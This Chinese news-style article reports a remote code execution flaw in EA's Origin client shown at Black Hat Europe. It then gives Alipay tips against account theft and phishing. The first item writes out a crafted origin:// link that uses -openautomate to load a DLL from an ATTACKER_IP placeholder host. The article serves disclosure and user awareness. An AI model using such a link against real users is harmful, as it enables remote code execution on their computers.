EA漏洞
在Black Hat Europe大会上,安全研究人员发现了一个影响4千万Origin玩家的漏洞,该漏洞允许攻击者在玩家电脑上远程执行恶意代码。 问题与EA Origin在玩家电脑上启动游戏的统一资源标识符有关。研究人员演示了如何控制一台安装 Crysis 3和Origin客户端的电脑:
EA 平台漏洞
通常Origin是使用origin://LaunchGame/71503链接启动游戏,但如果目标用户点击了链接 origin://LaunchGame/71503?CommandParams= -openautomate ATTACKER_IPevil.dll,Origin将会载入攻击者选择的Windows动态链接库文件。这个漏洞与去年发现的Steam漏洞相似(也是与Steam:// URL有关)。
网络支付
当你在网购时,可曾想过,有多少不法分子正不停地把黑手伸向你的“网上荷包”?记者昨日从第三方支付机构“支付宝”获悉,2012年,支付宝方面主动发现并拦截的网上支付风险数超过32.3万件。
支付宝
支付宝安全专家表示,最常见的风险类型是“账户盗用”和“木马钓鱼”。那么如何防范呢?小编为广大用户“支招”。
1、手机变更及时修改:
点评:“如果支付宝账户登录手机号不再使用,应及时修改,以确保个人隐私、账户的安全。
2、验证号码莫泄露
点评:一定不要随便点击卖家提供的链接,正规的第三方支付平台工作人员是不会索要账户密码信息的。当对方试图询问密码、手机校验码等信息时,千万不要透露。
3、陌生文件不接收
点评:用户在网上支付时,一定要注意不接收陌生文件,淘宝网购务必使用旺旺做交流工具,用正规的第三方支付平台交易。
4、账户“裸奔”要不得
点评:不管是通过哪种支付渠道,最好能采用高级别的保护措施,如使用网银时最好能够插U盾付款,使用支付宝时,应安装数字证书、支付盾、宝令等安全产品。
【免责声明】本文仅代表作者个人观点,与中国日用科技网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。您若对该稿件内容有任何疑问或质疑,请联系本网将迅速给您回应并做处理。